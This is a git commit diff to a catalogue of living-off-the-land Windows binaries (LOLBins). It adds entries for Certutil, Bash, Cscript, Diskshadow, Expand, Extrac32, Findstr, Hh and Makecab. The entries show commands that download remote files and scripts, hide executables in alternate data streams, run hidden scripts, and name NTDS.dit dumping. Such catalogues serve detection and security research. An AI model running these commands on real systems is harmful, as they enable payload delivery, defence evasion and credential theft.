Added some more LOLBins

Author: api0cradle

Contribute.md

@@ -20,6 +20,7 @@ Resources:
 Full path:
 ```
 c:\windows\system32\binary.exe
+c:\windows\sysWOW64\binary.exe
 ```
 
 Notes:

LOLBins.md

@@ -6,26 +6,42 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 # OS BINARIES
 
 [Atbroker.exe](OSBinaries/Atbroker.md)    
+[Bash.exe](OSBinaries/Bash.md)    
+[Certutil.exe](OSBinaries/Certutil.md)    
 [Cmstp.exe](OSBinaries/Cmstp.md)     
 [Control.exe](OSBinaries/Control.md)     
+[Cscript.exe](OSBinaries/Cscript.md)    
 [Dfsvc.exe](OSBinaries/Dfsvc.md)     
+[Diskshadow.exe](OSBinaries/Diskshadow.md)     
+[Extrac32.exe](OSBinaries/Extrac32.md)     
+[Expand.exe](OSBinaries/Expand.md)     
+[Findstr.exe](OSBinaries/Findstr.md)     
 [Forfiles.exe](OSBinaries/Forfiles.md)    
+[Hh.exe](OSBinaries/Hh.md)    
 [Ieexec.exe](OSBinaries/Ieexec.md)     
 [Ie4unit.exe](OSBinaries/Ie4unit.md)     
 [Infdefaultinstall.exe](OSBinaries/Infdefaultinstall.md)    
 [Installutil.exe](OSBinaries/Installutil.md)      
+[Makecab.exe](OSBinaries/Makecab.md)      
 [Mavinject.exe](OSBinaries/Mavinject.md)       
 [Msbuild.exe](OSBinaries/Msbuild.md)    
 [Msdt.exe](OSBinaries/Msdt.md)     
 [Mshta.exe](OSBinaries/Mshta.md)     
 [Msiexec.exe](OSBinaries/Msiexec.md)    
 [Odbcconf.exe](OSBinaries/Odbcconf.md)     
+[Pcalua.exe](OSBinaries/Pcalua.md)     
+[Powershell.exe](OSBinaries/Powershell.md)     
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
+[Print.exe](OSBinaries/Print.md)     
+[Reg.exe](OSBinaries/Reg.md)    
+[Regedit.exe](OSBinaries/Regedit.md)    
 [Regasm.exe](OSBinaries/Regasm.md)    
 [Regsvcs.exe](OSBinaries/Regsvcs.md)    
 [Regsvr32.exe](OSBinaries/Regsvr32.md)   
 [Rundll32.exe](OSBinaries/Rundll32.md)   
 [Runscripthelper.exe](OSBinaries/Runscripthelper.md)     
+[Sc.exe](OSBinaries/Sc.md)     
+[Scriptrunner.exe](OSBinaries/Scriptrunner.md)     
 [Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)     
 [Wmic.exe](OSBinaries/Wmic.md)     
 [Xwizard.exe](OSBinaries/Xwizard.md)     
@@ -34,18 +50,23 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 
 # OTHER MICROSOFT SIGNED BINARIES
 
+[Appvlp.exe](OtherMSBinaries/Appvlp.md)    
 [Bginfo.exe](OtherMSBinaries/Bginfo.md)    
 [Cdb.exe](OtherMSBinaries/Cdb.md)    
 [Csi.exe](OtherMSBinaries/Csi.md)    
 [Dnx.exe](OtherMSBinaries/Dnx.md)    
 [Msxsl.exe](OtherMSBinaries/Msxsl.md)    
 [Rcsi.exe](OtherMSBinaries/Rcsi.md)     
+[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)     
+[Sqlps.exe](OtherMSBinaries/Sqlps.md)     
 [Te.exe](OtherMSBinaries/Te.md)     
 [Tracker.exe](OtherMSBinaries/Tracker.md)     
 [Winword.exe](OtherMSBinaries/Winword.md)    
 
 
-
+# OTHER NON MICROSOFT BINARIES
+[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)     
+    
 
 
 

OSBinaries/Bash.md

@@ -0,0 +1,27 @@
+## Bash.exe
+
+* Functions: Execute
+
+```
+bash.exe -c calc.exe
+```
+
+Acknowledgements:
+* ?
+
+Code sample:
+* 
+
+Resources:
+* 
+
+Full path:
+```
+?
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Certutil.md

@@ -0,0 +1,36 @@
+## Certutil.exe
+
+* Functions: Download, Add ADS, Decode, Encode
+
+```
+certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe    
+    
+certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt    
+    
+certutil -encode inputFileName encodedOutputFileName   
+    
+certutil -decode encodedInputFileName decodedOutputFileName
+```
+
+Acknowledgements:
+* Matt Graeber - @mattifestation
+* Moriarty - @Moriarty2016
+
+Code sample:
+* 
+
+Resources:
+* https://twitter.com/Moriarty_Meng/status/984380793383370752
+* https://twitter.com/mattifestation/status/620107926288515072
+
+Full path:
+```
+c:\windows\system32\certutil.exe
+c:\windows\sysWOW64\certutil.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Cscript.md

@@ -0,0 +1,29 @@
+## Cscript.exe
+
+* Functions: Execute, Read ADS
+
+```
+cscript c:\ads\file.txt:script.vbs
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+
+Full path:
+```
+c:\windows\system32\cscript.exe
+c:\windows\sysWOW64\cscript.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Diskshadow.md

@@ -0,0 +1,30 @@
+## Diskshadow.exe
+
+* Functions: Execute, Dump NTDS.dit
+
+```
+diskshadow.exe /s c:\test\diskshadow.txt   
+
+diskshadow> exec calc.exe    
+```
+
+Acknowledgements:
+* Jimmy - @bohops
+
+Code sample:
+*
+
+Resources:
+* https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+Full path:
+```
+c:\windows\system32\diskshadow.exe
+c:\windows\sysWOW64\diskshadow.exe
+```
+
+Notes:
+Only present on Windows Server OS 2008 and newer
+
+
+ 

OSBinaries/Expand.md

@@ -0,0 +1,34 @@
+## Expand.exe
+
+* Functions: Download, Copy, Add ADS
+
+```
+expand \\webdav\folder\file.bat c:\ADS\file.bat    
+
+expand c:\ADS\file1.bat c:\ADS\file2.bat    
+
+expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat     
+```
+
+Acknowledgements:
+* Rahmat Nurfauzi - @infosecn1nja
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* [NameOfLink](Payload/NameOfPayload)
+
+Resources:
+* https://twitter.com/infosecn1nja/status/986628482858807297
+* https://twitter.com/Oddvarmoe/status/986709068759949319
+
+Full path:
+```
+c:\windows\system32\Expand.exe
+c:\windows\sysWOW64\Expand.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Extrac32.md

@@ -0,0 +1,31 @@
+## Extrac32.exe
+
+* Functions: Add ADS
+
+```
+extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe    
+
+extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe    
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\extrac32.exe
+c:\windows\sysWOW64\extrac32.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Findstr.md

@@ -0,0 +1,31 @@
+## Findstr.exe
+
+* Functions: Add ADS
+
+```
+findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe    
+
+findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe    
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\findstr.exe
+c:\windows\sysWOW64\findstr.exe
+```
+
+Notes:
+Some specific details about the binary file.
+
+
+ 

OSBinaries/Forfiles.md

@@ -3,7 +3,8 @@
 * Functions: Execute, Read ADS
 
 ```
-forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe    
+forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe     
+
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"    
 ```
 

OSBinaries/Hh.md

@@ -0,0 +1,30 @@
+## hh.exe
+
+* Functions: Open Explorer
+
+```
+HH.exe http://www.google.com      
+
+HH.exe C:\    
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
+
+Full path:
+```
+c:\windows\system32\hh.exe
+c:\windows\sysWOW64\hh.exe
+```
+
+Notes:
+
+
+
+ 

OSBinaries/Makecab.md

@@ -0,0 +1,32 @@
+## Makecab.exe
+
+* Functions: Package, Add ADS, Download
+
+```
+makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab    
+
+makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab    
+   
+makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
+```
+
+Acknowledgements:
+* Oddvar Moe - @oddvarmoe
+
+Code sample:
+* 
+
+Resources:
+* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+
+Full path:
+```
+c:\windows\system32\makecab.exe
+c:\windows\sysWOW64\makecab.exe
+```
+
+Notes:
+
+
+
+